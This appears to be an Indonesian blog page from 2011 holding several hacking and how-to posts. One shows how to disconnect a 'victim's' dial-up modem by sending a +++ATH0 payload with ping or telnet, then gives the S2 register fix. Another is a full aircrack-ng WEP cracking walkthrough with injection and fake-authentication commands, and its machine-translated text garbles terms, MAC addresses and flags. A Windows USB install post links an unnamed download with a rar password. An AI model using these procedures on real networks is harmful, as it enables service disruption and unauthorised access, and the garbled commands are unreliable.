Jumat, 09 Desember 2011

TEKNIK DISCONNECT KAN MODEM LAWAN !!!

Betapa mudahnya melakukan koneksi ke Internet dengan modem, tinggal membuat koneksi dengan wizard, klik connect dan selesailah semuanya. Di balik semua kemudahan ini, pernahkan terpikirkan bagaimana komputer berkomunikasi dengan modem ?
Agar Anda lebih memahaminya, klik tombol Start i) Control Panel [> Phone and Modem Options [>Modems [> Pilih modem yang Anda gunakan [> Properties  

Pada form properties modem, klik tombol Query Modem(l). Perhatikan pada kolom Command dan Response (2), yang memperlihatkan karakter-karakter aneh. Jika diperhatikan, perintah atau command semuanya dimulai dengan huruf AT, karena itulah seringkali perintah-perintah ke modem sering disebut sebagai "perintah AT". Perintah AT ini mengikuti standard Hayes yang hampir digunakan oleh semua modem (bahkan saya tidak mampu memberikan contoh modem yang tidak menggunakannya).
Dalam perintah AT yang juga bisa Anda lakukan secara manual melalui HyperTerminal, untuk melakukan dial ke suatu nomor, digunakan perintah ATDT atau ATDP. Misalkan saat Anda melakukan koneksi ke Internet dengan nomor telepon 080989999, maka sebenarnya yang dilakukan secara internal adalah penggunaan perintah ATDT 080989999 atau ATDP 080989999.
Modem yang mendapatkan perintah ini akan segera melakukan dial ke Telkomnet. AT bisa diartikan meminta perhatian (ATtention) dari modem, sedangkan DT artinya Dial by Tone dan DP artinya Dial by Pulse.
Ketika modem dalam keadaan online, perintah AT tidak bisa diberikan kepada modem karena perintah-perintah AT yang Anda berikan akan dianggap sebagai data untuk ditransfer.
Lalu bagaimana memerintahkan modem untuk melakukan disconnect ? Pertanyaan bagus! Komputer akan mengirimkan kode +++ yang berarti meminta modem merubah modus pengiriman data menjadi modus perintah. Kode +++ yang juga disebut sebagai escape characters ini memungkinkan kita memberikan perintah ATH0 yang akan memerintahkan modem untuk segera melakukan disconnect (+++ATH0).
Kini sampailah pada bagian yang menyenangkan. Ternyata dengan mengirimkan data +++ATH0 ke komputer korban dengan modem yang bermasalah,
data tersebut akan diterjemahkan menjadi perintah untuk memutuskan koneksi!. Pengiriman data ini bisa dilakukan dengan berbagai cara seperti melalui ping (hanya untuk keluarga linux) :
[root@lct root]* ping -p 2b2b2b415448300d -c 5 202.152.0.2
PATTERN: 0x2b2b2b415448300d
PING 202.152.0.2 (202.152.0.2) : 56 data bytes – 202.152.0.2 ping statistics -
5 packets transmitted, 0 packets received, 100% packet loss [root@narf ath0]#
Terlihat bahwa setelah menjalankan perintah ping yang berisi data +++athO, komputer korban tidak memberikan respon yang besar kemungkinan komputer korban telah disconnect.
Tentu saja cara ini juga bisa memberikan efek terhadap diri Anda sendiri jika menggunakan modem yang bermasalah, artinya justru Andalah yang pertama akan mendapatkan disconnect.
Bagaimana dengan pengguna windows ? masih terdapat berbagai cara seperti melalui telnet ke komputer korban (tentu saja jika komputer korban menjalankan ftp server) :
C:\>telnet 202.152.0.2
Trying 192.168.1.1.. .Connected to 192.168.1.1. Escape character is ,A]’.
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri
Dec 12
20:41:
USER +++ATH0 A]
telnet> close Connection closed.
Bagi pengguna windows, cara yang paling mudah adalah menggunakan program yang telah dibuat oleh Misoskian . Anda tinggal menjalankan program ini dan memasukkan alamat 1P komputer korban. Program yang diberi nama ROCKET (Gambar 20-2) ini berjalan sangat bagus dan sangat mudah penggunaannya.

Saya tidak mengetahui secara jelas siapakah penemu masalah ini, tapi yang jelas masalah yang sudah hampir berumur 5 tahun ini sampai saat ini masih terus berlanjut. Notebook yang saya gunakan saat ini, yang dibeli pada tahun 2002, Toshiba, Pentium 1.1 Ghz masih bermasalah untuk kelemahan ini. Akibatnya ? jika saya sedang menggunakan modem, dan ada yang melakukan penyerangan semacam ini, maka modem saya akan langsung disconnect.
Bagaimana menyelesaikan masalah ini agar kita tidak menjadi target atau bulan-bulanan orang iseng ? Adrian Gonzalez menyarankan Anda untuk merubah string S2 menjadi 255.
Perintah untuk merubah string S2 ini selengkapnya adalah ATS2=255. Perubahan ini bisa dilakukan melalui HyperTerminal (Start [> Programs i>Accessories [> Communications i> HyperTerminal).
 Gambar 2. Koneksi ke modem dengan Hyperterminal
Melalui HyperTerminal (Gambar 3), Anda bisa memasukkan perintah untuk merubah isi S2 menjadi 255.
Warna abu-abu adalah apa yang saya ketikkan melalui keyboard sedangkan yang warna hitam adalah respon yang ditampilkan oleh komputer. Perlu diperhatikan bahwa perintah-perintah yang saya ketikkan sebenarnya tidaklah kelihatan pada layar monitor (karena local echo tidak diaktifkan). Perhatikan perintah-perintah yang digunakan:
  1. Saya mengetikkan perintah AT dan menekan enter. Modem memberikan respon OK.
  2. Saya mengetikkan perintah ATS2? Untuk mengetahui nilai S2 saat ini. Modem menjawab nilainya 043
  3. Saya mengetikkan perintah ATS2 = 255 yang berarti memasukkan nilai 255 ke S2. Modem menjawab OK yang artinya perintah telah dijalankan dengan baik
  4. Saya mengetikkan perintah ATS2? Dan menekan enter untuk mengetahui nilai S2 saat ini. Modem menjawab 255.
  5. Kini langkah selanjutnya, yang dilakukan haruslah merekam perubahan ini ke dalam modem. Perintah yang sering digunakan
adalah WOl. Sayang sekali, modem internal notebook yang saya miliki tidak ada dokumentasi sama sekali mengenai perintah AT ini dan perintah yang saya ketahui ternyata tidak berlaku.
Oleh karena itu, ketika saya disconnect dari HyperTerminal, nilai S2 akan kembali ke semula yaitu 043. Anda tentu mempunyai kasus yang berbeda dengan saya dan mungkin bisa melakukan perubahan permanen pada modem ini.
Cara lain yang bisa digunakan dan saya gunakan saat ini adalah menambah perintah tambahan ketika modem di-inisialisasi. Jadi sebelum modem digunakan, nilai string S2 akan diisi secara otomatis oleh sistem operasi menjadi 255.
 Gambar 4. Inilialisasi Modem 

Untuk menambah string inisialisasi ke dalam modem yar bermasalah, klik tombol Start [> Control Panel 0 Phone and Modem Options i> Modems 0> Pilih modem yang Anda gunakan [> Properties i> Advanced. Pada kolom “Extra initialization commands:” masukkan perintah ATS2=255.
Tidak semua modem mempunyai masalah seperti ini, karena itu Anda perlu memastikan apakah modem Anda perlu di rubah atau ditambahkan inialisasi ini.

Semoga bermanfaat untuk semua yg membutuhkan ini..

CARA HACK WEP DENGAN AIRCRACK !!!


 Pengenalan
Tutorial ini menuntun Anda meskipun kasus yang sangat sederhana untuk crack kunci WEP . Hal ini dimaksudkan untuk membangun keterampilan dasar Anda dan mendapatkan Anda akrab dengan konsep-konsep. Ini mengasumsikan Anda memiliki kartu nirkabel yang bekerja dengan driver yang sudah ditambal untuk injeksi.
Dianjurkan agar Anda melakukan percobaan dengan titik akses nirkabel rumah Anda untuk mendapatkan keyamanan &bebas dengan ide-ide dan teknik. Jika Anda tidak memiliki titik akses tertentu, ingatlah untuk mendapatkan izin dari pemilik sebelum bermain dengan itu.
Saya ingin mengakui dan berterima kasih kepada tim aircrack-ng untuk menghasilkan suatu alat yang kuat yang hebat.
Harap kirimi saya setiap umpan balik yang konstruktif, positif atau negatif. Ide-ide pemecahan masalah tambahan dan tips sangat welcome.
Asumsi
Pertama, solusi ini mengasumsikan:
  • Anda menggunakan driver ditambal untuk injeksi.
  • Anda secara fisik cukup dekat untuk mengirim dan menerima paket jalur akses. Ingatlah bahwa hanya karena Anda dapat menerima paket dari titik akses tidak berarti Anda mungkin akan dapat mengirimkan paket ke AP. Kekuatan kartu nirkabel biasanya kurang maka kekuatan AP. Jadi, Anda harus secara fisik cukup dekat untuk paket Anda dikirimkan untuk mencapai dan diterima oleh AP.
  • Ada setidaknya satu klien kabel atau nirkabel tersambung ke jaringan dan mereka aktif. Alasannya adalah bahwa tutorial ini tergantung pada menerima setidaknya satu paket permintaan ARP dan jika tidak ada klien aktif maka tidak akan ada paket permintaan ARP.
  • Anda menggunakan v0.9 dari aircrack-ng. Jika Anda menggunakan versi yang berbeda maka beberapa pilihan umum mungkin harus diubah.
Pastikan semua asumsi di atas adalah benar, jika tidak, nasihat yang berikut tidak akan bekerja. Dalam contoh di bawah, Anda akan perlu untuk mengubah “ath0″ dengan nama interface yang spesifik untuk kartu nirkabel Anda.
Peralatan yang digunakan
Dalam tutorial ini, peralatan yang digunakan adalah :
  • Alamat MAC dari PC suite menjalankan aircrack-ng: 0:00 F: B5: 88: AC: 82
  • BSSID (MAC alamat titik akses): 00:14:06 C: 7E: 40:80
  • ESSID (atau nama jaringan nirkabel): Lombok_Creck84
  • Jalur akses saluran: 9
  • Wireless interface: ath0
Anda harus mengumpulkan informasi yang setara untuk jaringan Anda akan bekerja pada. Kemudian hanya mengubah nilai dalam contoh di bawah ini ke jaringan tertentu.
Solusi
Ikhtisar Solusi
Untuk crack WEP kunci untuk jalur akses, kita perlu mengumpulkan banyak vektor inisialisasi (infus). Jaringan lalu lintas normal tidak biasanya menghasilkan ini IVs sangat cepat. Secara teoritis, jika kamu bersabar, Anda dapat mengumpulkan infus cukup untuk memecahkan WEP kunci dengan hanya mendengarkan lalu lintas jaringan dan menyimpan mereka. Karena tidak satupun dari kita yang sabar, kita menggunakan teknik yang disebut injeksi untuk mempercepat proses. Injeksi melibatkan memiliki titik akses (AP) mengirim ulang paket yang dipilih berulang sangat cepat. Hal ini memungkinkan kita untuk menangkap sejumlah besar infus dalam waktu singkat.
Setelah kami telah menangkap sejumlah besar infus, kita dapat menggunakannya untuk menentukan WEP kunci.
Berikut adalah langkah-langkah dasar kita akan pergi melalui:
  1. Jalankan interface nirkabel dalam mode monitor pada saluran AP tertentu
  2. Uji kemampuan injeksi perangkat nirkabel untuk AP
  3. Gunakan aireplay-ng untuk melakukan otentikasi palsu dengan jalur akses
  4. Mulai airodump-ng di AP saluran dengan BSSID filter untuk mengumpulkan infus unik baru
  5. Mulai aireplay-ng dalam modus memutar ulang permintaan ARP untuk menyuntikkan paket
  6. Jalankan aircrack-ng untuk memecahkan kunci menggunakan infus dikumpulkan
Langkah 1 – Jalankan interface nirkabel dalam mode monitor pada saluran AP
Tujuan dari langkah ini adalah untuk menempatkan kartu anda ke dalam apa yang disebut mode monitor. Mode monitor adalah mode dimana kartu Anda dapat mendengarkan setiap paket di udara. Biasanya kartu Anda hanya akan “mendengar” paket yang ditujukan kepada Anda. Dengan mendengar setiap paket, kita kemudian dapat memilih beberapa untuk injeksi. Selain itu, hanya (ada beberapa pengecualian jarang) mode monitor memungkinkan Anda untuk menyuntikkan paket. (Catatan:. Prosedur ini berbeda untuk non-Atheros kartu)
Pertama berhenti ath0 dengan memasukkan:
airmon-ng ath0 berhenti
Sistem merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP hancur)
Masukkan “iwconfig” untuk memastikan tidak ada antarmuka athX lainnya.Seharusnya terlihat seperti ini:
lo ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel.
Jika ada interface athX tersisa, kemudian berhenti masing-masing. Ketika Anda selesai, jalankan “iwconfig” untuk memastikan ada yang tersisa satupun.
Sekarang, masukkan perintah berikut untuk memulai kartu nirkabel pada saluran 9 dalam mode monitor:
airmon-ng start wifi0 9
Pengganti nomor saluran yang berjalan pada AP Anda untuk “9″ pada perintah di atas. Hal ini penting. Anda harus memiliki kartu nirkabel Anda terkunci ke saluran AP untuk langkah-langkah berikut dalam tutorial ini untuk bekerja dengan benar.
Catatan: Dalam perintah ini kita menggunakan “wifi0″ bukan antarmuka nirkabel kami “ath0″. Hal ini karena driver madwifi-ng yang digunakan. Untuk pengemudi lain, gunakan nama antarmuka nirkabel. Contoh: “wlan0″ atau “rausb0″.
Sistem akan merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Anda akan melihat bahwa “ath0″ dilaporkan di atas sebagai dimasukkan ke dalam mode monitor.
Untuk mengkonfirmasi antarmuka setup dengan benar, masukkan “iwconfig”.
Sistem akan merespon:
lo ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. ath0 IEEE 802.11g ESSID: “” Nickname: “” Mode: Monitor Frequency: 2,452 GHz Access Point: F 00:00: B5: 88: AC: 82 Bit Rate: 0 kb / s Tx-Power: 18 dBm = 0 Sensitivitas / 3 Retry: off RTS thr: off Fragment thr: Enkripsi kunci dari: Manajemen Matikan: Link Kualitas off = 0 / 94 tingkat Sinyal =- 95 dBm Noise level =- 95 dBm Rx invalid nwid: 0 Rx invalid crypt: 0 Rx invalid frag: 0 Tx berlebihan retries: 0 Invalid misc: 0 Missed beacon: 0
Dalam tanggapan di atas, Anda dapat melihat bahwa ath0 dalam mode monitor, pada frekuensi 2.452GHz yang adalah saluran 9 dan Access Point menunjukkan alamat MAC dari kartu nirkabel Anda. Harap dicatat bahwa hanya madwifi-ng driver menunjukkan alamat MAC dari kartu nirkabel Anda, pembalap lain tidak melakukan hal ini. Jadi semuanya baik. Hal ini penting untuk memastikan semua informasi ini sebelum melanjutkan, jika langkah-langkah berikut tidak akan bekerja dengan baik.
Untuk mencocokkan frekuensi untuk saluran, check out:http://www.rflinx.com/help/calculations/ # 2.4ghz_wifi_channels kemudian pilih “Channel Seleksi Wifi dan Channel Tumpang tindih” tab. Ini akan memberi Anda frekuensi untuk setiap saluran.
Langkah 2 – Uji Perangkat Wireless Packet Injection
Tujuan dari langkah ini memastikan bahwa kartu Anda berada dalam jarak AP Anda dan dapat menyuntikkan paket untuk itu.
Masukkan:
aireplay-ng-e -9 boneka-C 00:14:06: 7E: 40:80 ath0
Dimana:
  • -9 Berarti injeksi tes
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • ath0 adalah nama antarmuka nirkabel
Sistem harus merespon dengan:
09:23:35 Menunggu mercusuar bingkai (BSSID: 00:14:06 C: 7E: 40:80) di channel 9 09:23:35 siaran permintaan penyelidikan Mencoba … 09:23:35 Injeksi bekerja! 09:23:37 Ditemukan 1 AP 09:23:37 Mencoba permintaan penyelidikan diarahkan … 09:23:37 00:14:06 C: 7E: 40:80 – channel: 9 – ‘boneka’ 09:23:39 Ping (min / avg / max): 1.827ms/68.145ms/111.610ms Power: 33,73 09 : 30/30 23:39: 100%
Baris terakhir adalah penting. Idealnya itu harus mengatakan 100% atau persentase yang sangat tinggi. Jika rendah maka Anda terlalu jauh dari AP atau terlalu dekat. Jika nol maka injeksi tidak bekerja dan Anda perlu patch driver Anda atau menggunakan driver yang berbeda.
Langkah 3 – Mulai airodump-ng untuk menangkap infus
Tujuan dari langkah ini adalah untuk menangkap infus yang dihasilkan. Langkah ini dimulai airodump-ng untuk menangkap IVs dari titik akses tertentu.
Buka konsol sesi lain untuk menangkap infus yang dihasilkan. Kemudian masukkan:
airodump-ng-c 9 – BSSID 00:14:06 C: 7E: 40:80-w ath0 keluaran
Dimana:
  • -C 9 adalah saluran untuk jaringan nirkabel
  • - BSSID 00:14:06 C: 7E: 40:80 adalah titik akses alamat MAC. Hal ini menghilangkan lalu lintas asing.
  • -W capture awalan nama file untuk file yang akan berisi infus.
  • ath0 adalah nama antarmuka.
Sementara suntikan berlangsung (kemudian), layar akan terlihat seperti ini:
CH 9] [Berlalu: 8 mins] [2007/3/21 19:25 BSSID PWR Beacons # RXQ Data, # / s CH MB ENC ESSID cipher AUTH 00:14:06 C: 7E: 40:80 42 100 5240 1783 07 338 9 54   WEP  WEP          Lombok_Creck84  BSSID STATION PWR Hilang Probe Paket 00:14:06 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782
Langkah 4 - Gunakan aireplay-ng # untuk melakukan otentikasi palsu dengan jalur akses
Dalam rangka untuk jalur akses untuk menerima sebuah paket, sumber alamat MAC harus sudah terkait. Jika sumber alamat MAC Anda suntik tidak terkait maka AP mengabaikan paket tersebut dan mengirimkan sebuah "deauthentication" paket dalam cleartext. Dalam keadaan ini, tidak ada infus baru tercipta karena AP adalah mengabaikan semua paket disuntikkan.
Kurangnya hubungan dengan jalur akses adalah satu alasan terbesar mengapa injeksi gagal. Ingat aturan emas: MAC Anda gunakan untuk injeksi harus terkait dengan AP dengan baik menggunakan otentikasi palsu atau menggunakan MAC dari klien yang sudah terkait.
Untuk mengasosiasikan dengan jalur akses, menggunakan otentikasi palsu:
aireplay-ng -1 0-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • -1 Berarti otentikasi palsu
  • 0 reassociation waktu dalam hitungan detik
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • -H F 00:00: B5: 88: AC: 82 adalah alamat MAC kartu kita
  • ath0 adalah nama antarmuka nirkabel
Sukses terlihat seperti:
18:18:20 Otentikasi Mengirim Permintaan 18:18:20 18:18:20 Otentikasi berhasil Mengirim Permintaan 18:18:20 Asosiasi Asosiasi sukses :-)
Atau variasi lain untuk jalur akses pemilih:
aireplay-ng -1 6000-o 1-q 10-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • 6000 - Reauthenticate setiap detik 6000. Periode panjang juga menyebabkan tetap hidup paket akan dikirim.
  • -O 1 - Kirim hanya satu set paket pada suatu waktu. Default adalah beberapa dan ini membingungkan beberapa AP.
  • -Q 10 - Mengirim paket tetap hidup setiap 10 detik.
Sukses terlihat seperti:
18:22:32 Mengirim Permintaan 18:22:32 Otentikasi Authentication sukses 18:22:32 Mengirim Permintaan 18:22:32 Asosiasi Asosiasi sukses :-) 18:22:42 Mengirim tetap-hidup paket 18:22:52 Mengirim tetap -hidup paket # dan seterusnya.
Berikut adalah contoh dari apa otentikasi gagal terlihat seperti:
08:28:02 Otentikasi Permintaan Mengirim 18:28:02 Otentikasi 18:28:02 sukses Mengirim Permintaan 18:28:02 Asosiasi Asosiasi sukses :-) 18:28:02 Punya paket deauthentication! 18:28:05 Mengirim Permintaan 18:28:05 Otentikasi Authentication sukses 18:28:05 Mengirim Permintaan Asosiasi 18:28:10 Mengirim Permintaan Otentikasi Authentication 18:28:10 sukses 18:28:10 Mengirim Permintaan Asosiasi
Perhatikan "Punya paket deauthentication" dan retries terus menerus di atas.Jangan lanjutkan ke langkah berikutnya sampai Anda memiliki otentikasi yang palsu berjalan dengan benar.
Tips Pemecahan Masalah
  • Beberapa jalur akses yang dikonfigurasi untuk hanya memperbolehkan alamat MAC dipilih untuk mengasosiasikan dan menghubungkan. Jika hal ini terjadi, Anda tidak akan dapat berhasil melakukan otentikasi palsu kecuali jika Anda tahu salah satu alamat MAC pada daftar yang diperbolehkan. Jika Anda menduga ini adalah masalah, gunakan perintah berikut ketika mencoba untuk melakukan otentikasi palsu. Mulai sesi lain dan ...
Jalankan: tcpdump-n-vvv-s0-e-i
Anda kemudian akan mencari pesan kesalahan.
  • Jika suatu saat Anda ingin mengonfirmasi Anda benar terkait adalah dengan menggunakan tcpdump dan melihat paket. Mulai sesi lain dan ...
Jalankan: "tcpdump-n-e-s0-vvv-i ath0"
Berikut ini adalah tcpdump khas pesan galat yang Anda cari:
 11:04:34.360700 314us BSSID: 00:14:06 c: 7e: 40:80 DA: F 00:00: B5: 88: AC: 82 SA: 00:14:06 c: 7e: deauthentication 40:80: Kelas 3 bingkai diterima dari stasiun nonassociated
Perhatikan bahwa titik akses (00:14:06 c: 7e: 40:80) memberitahu sumber (0:00 F: B5: 88: AC: 82) Anda tidak terkait. Artinya, AP tidak akan memproses atau menerima paket disuntikkan.
Jika Anda ingin memilih hanya paket deauth dengan tcpdump maka Anda dapat menggunakan: "tcpdump-n-e-s0-vvv-i ath0 | grep-i deauth". Anda mungkin perlu tweak frase "deauth" untuk memilih paket yang tepat yang Anda inginkan.
Langkah 5 - Mulai aireplay-ng dalam modus memutar ulang permintaan ARP
Tujuan dari langkah ini adalah mulai aireplay-ng dalam mode yang mendengarkan permintaan ARP kemudian reinjects mereka kembali ke jaringan.Untuk penjelasan ARP, lihat halaman PC Magazine atau Wikipedia . Alasan kita memilih paket ARP permintaan karena AP biasanya akan rebroadcast mereka dan menghasilkan IV baru. Sekali lagi, ini adalah tujuan kami, untuk mendapatkan sejumlah besar infus dalam waktu singkat.
Buka konsol sesi lain dan masukkan:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Ini akan mulai mendengarkan permintaan ARP dan ketika mendengar satu, aireplay-ng akan segera mulai menyuntikkan. Pada jaringan rumah Anda, di sini adalah cara mudah untuk menghasilkan sebuah permintaan ARP: Pada PC kabel, ping IP tidak ada di LAN rumah Anda.
Berikut adalah apa layar tampak seperti ketika ARP permintaan sedang disuntikkan:
Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Anda dapat mengkonfirmasi bahwa Anda suntik dengan memeriksa airodump-ng layar Anda. Paket data harus meningkat pesat. The "# / s" harus angka yang layak. Namun, yang layak tergantung pada berbagai faktor besar. Sebuah jarak umumnya adalah 300 sampai 400 paket data per detik. Hal ini dapat serendah 100/second dan setinggi 500/second satu.
Tips Pemecahan Masalah
  • Jika Anda menerima pesan yang mirip dengan "Punya paket deauth / disassoc. Apakah sumber terkait mac? ", Ini berarti Anda telah kehilangan hubungan dengan AP. Semua paket Anda disuntikkan akan diabaikan. Anda harus kembali ke langkah otentikasi palsu (Langkah 3) dan berhasil asosiasi dengan AP.
Langkah 6 - Jalankan aircrack-ng untuk mendapatkan kunci WEP
Tujuan dari langkah ini adalah untuk mendapatkan WEP kunci dari IV berkumpul di langkah sebelumnya.
Catatan: Untuk tujuan belajar, Anda harus menggunakan 64 bit WEP kunci pada AP Anda untuk mempercepat proses cracking. Jika hal ini terjadi, maka Anda dapat menyertakan "-n 64" untuk membatasi pemeriksaan kunci 64 bit.
Dua metode akan ditampilkan. Disarankan Anda mencoba baik untuk tujuan belajar. Dengan mencoba kedua metode, Anda akan melihat dengan cepat metode PTW berhasil menentukan WEP kunci dibandingkan dengan metode FMS / Korek. Sebagai pengingat, metode PTW hanya bekerja dengan sukses dengan arp permintaan / jawaban paket. Karena tutorial ini mencakup injeksi paket ARP request, Anda benar dapat menggunakan metode ini. Persyaratan lainnya adalah bahwa Anda menangkap paket penuh dengan airodump-ng. Artinya, tidak menggunakan "- ivs" pilihan.
Mulai sesi lain konsol dan masukkan:
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -Z memanggil PTW WEP metode-retak.
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Untuk juga menggunakan metode FMS / Korek, mulai lagi sesi konsol dan masukkan:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Jika Anda menggunakan 1.0 RC1-, menambahkan opsi "-K" untuk serangan FMS / Korek. (1.0-RC1 default untuk PTW.)
Anda dapat menjalankan ini sementara menghasilkan paket. Dalam waktu singkat, WEP kunci akan dihitung dan disajikan. Anda akan membutuhkan sekitar 250.000 infus untuk 64 bit dan 1.500.000 infus untuk 128 bit kunci. Jika Anda menggunakan serangan PTW, maka Anda akan membutuhkan sekitar 20.000 paket untuk 64-bit dan 40.000 sampai 85.000 paket untuk 128 bit. Ini sangat perkiraan dan ada banyak variabel untuk berapa banyak infus yang sebenarnya Anda butuhkan untuk memecahkan Kunci WEP.
Berikut adalah apa sukses terlihat seperti:
                                              Aircrack-ng 0,9
KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%
Perhatikan bahwa dalam kasus ini dibutuhkan jauh lebih sedikit maka diperkirakan 250.000 infus untuk memecahkan kuncinya. (Untuk contoh ini, serangan FMS / Korek digunakan.)

CARA MENGINSTALL WINDOWS DENGAN FLASHDISK

Oke Mas Bro Postingan Kale ne Mengenai Teknik Install Menggunakan Flashdisk.
Langsung aja tidak usah basa-basi, kali ini penulis akan  membahas tentang Cara Install Windows XP dengan Flashdisk. Mungkin banyak teman-teman yang juga sudah memakainya, tapi mungkin banyak juga yang belum tahu. Tutorial Cara Install Windows XP dengan Flashdisk ini dijamin bisa 100%.
Mau tahu …?
Cara Install Windows XP dengan Flashdisk :

Siapkan Bahan-Bahannya:
  • CD OS Windows XP
  • Flashdisk kosong minimal 1 GB (hati-hati data yg ada di dalamnya akan terhapus)
  •  File USB PREP8 + PeToUSB
  • File Bootsect.exe, 
  • Komputer lain yang memakai OS Windows XP dengan ruang kosong di Drive C minimal 1,5 Gb.
Nah DOWNLOAD DISNI  file yang di butuhkan di atas 
password Rar : boeimcyber
  1. Tancapkan Flasdisk Kosong Anda ke USB Komputer
  2. Extract File boeim.rar dan extract file MembuatFlashdiskBootableXP.rar Yang Telah Anda Download di Drive C Langsung
  3. selanjutnya baca cara pengerjaanya di article yang sudah anda donlod td..

    semoga bermanfaat yaa...

TEKNIK SETTING KEAMANAN WIRELESS


Wireless network menawarkan kenyamanan karena karena tidak membutuhkan kabel yang terekadang sangat sulit untuk dipasang, namun kemudahan ini juga harus dibayar dengan permasalahan keamanan yang lebih kritis karena media udara merupakan media publik yang tidak bisa dikontrol. Bagaimana jaringan wireless melindungi dirinya dari masalah semacam ini ?
Bntuk menggunakan jaringan kabel, Anda harus menghubungkan kabel UTP ke dalam port hub/switch. Setelah terhubung, Anda langsung —.empunyai hak untuk mengirimkan ataupun menerima data melalui -ub/switch tersebut. Bagaimana bila ada orang asing yang membawa kabel UTP sendiri kemudian ia menghubungkan komputernya dengan hub/switch ? Yah, orang tersebut otomatis secara fisik sudah terhubung ke dalam jaringan Anda, ia bisa mengirimkan data ke semua komputer, ia bisa mengintip paket-paket data yang ada di dalam jaringan dlsb.
Pada jaringan kabel, Anda bisa berdalih “saya mempunyai peraturan yang sangat ketat sehingga tidak semua orang bisa memasukkan kabel ke dalam switch”. Anda mungkin benar walaupun saya tidak yakin sama sekali, ‘.alu bagaimana dengan koneksi wireless ? Bagaimana koneksi wireless mengamankan data yang lalu-lalang di udara ? Bisakah Anda menjaga data yang ada di udara agar tidak dicuri ?
Keamanan jaringan wireless mengalami perjalanan yang cukup panjang dan melelahkan, mengalami serangan-serangan dari para ahli dan hacker yang. memaksa standarisasi keamanan yang digunakan saat itu masuk ke dalam neraka. Pada bagian ini saya akan memberikan Anda sedikit pelajaran sejarah perjalanan keamanan yang ada pada jaringan wireless yang dimulai dengan 802.11 Standard.

802.11 Standard

Pada bagian ini, Anda akan melihat cerita kegagalan yang dilakukan oleh standarisasi keamanan awal yang memalukan. Memalukan karena metode pengamanan yang dinamakan sebagai WEP (Wired Equivalent Privacy) mengharapkan standarisasi keamanan yang setara dengan kabel.
Kenyataannya, setinggi apapun keamanan wireless, tidak akan mampu menyaingi level keamanan kabel. Sebagai contoh, adalah tidak mungkin mencegah usaha sniffing yang dilakukan oleh hacker karena media udara yang tidak bisa di ikat dan diajak kerjasama. Wireless juga mempunyai permasalahan serangan yang tidak bisa dipecahkan yaitu interfrensi. Hacker bisa membuat jaringan wireless Anda tidak bisa bekerja tanpa ada yang mampu mencegahnya. Inil dunia wireless bung !
WEP bukanlah algoritma enkripsi.
Banyak yang mengira bahwa WEP adalah sebuah algoritma, pada kenyataanya WEP memang bertanggung jawab terhadap keamanan yang ada pada jaringan wireless namun WEP bu­kanlah algoritma enkripsi ! WEP menggunakan algoritma en­kripsi RC4 yang juga digunakan oleh protokol https.
Algoritma ini terkenal sederhana dan mudah diimplementasikan karena tidak membutuhkan perhitungan yang berat sehingga tidak membutuhkan hardware yang terlalu canggih.
Standarisasi awal keamanan wireless 802.11 ini menentukan bahwa untuk bisa bergabung ke dalam jaringan AP, sebelum Anda diperbolehkan  mengirim dan menerima data melalui AP, terdapat 2 pintu yang harus dilalui yaitu Authentication dan Association. Standarisasi 802.11 menggunakan 2 jenis authentication yaitu:
  1. Open System Authentication
  2. SharedKey Authentication (WEP)

1. Open System Authentication

Pada open system authentication, bisa dikatakan tidak ada authentication yang terjadi karena AP akan selalu memberikan jawaban”OK, masuk aja teman. Anggap seperti rumah sendiri”.
Setelah client melalui proses Open System authentication dan Association, client sudah diperbolehkan mengirimkan data melalui AP namun tidak seperti perkiraan Anda, data yang dikirimkan tidak serta merta akan dilanjutkan oleh AP ke dalam jaringannya.
Bila level keamanan WEP diaktifkan, maka data-data yang dikirimkan oleh Client haruslah dienkripsi dengan WEP Key. Bila ternyata setting WEP Key di client berbeda dengan Setting WEP Key di AP maka AP tidak akan mengenal data yang dikirimkan oleh client yang mengakibatkan data tersebut akan di buang ke tong sampah.
Jadi walaupun client diijinkan untuk mengirim data, namun data tersebut tetap tidak akan bisa melalui jaringan AP bila WEP Key antara Client dan AP ternyata tidak sama.

2. Shared Key Authentication (WEP)

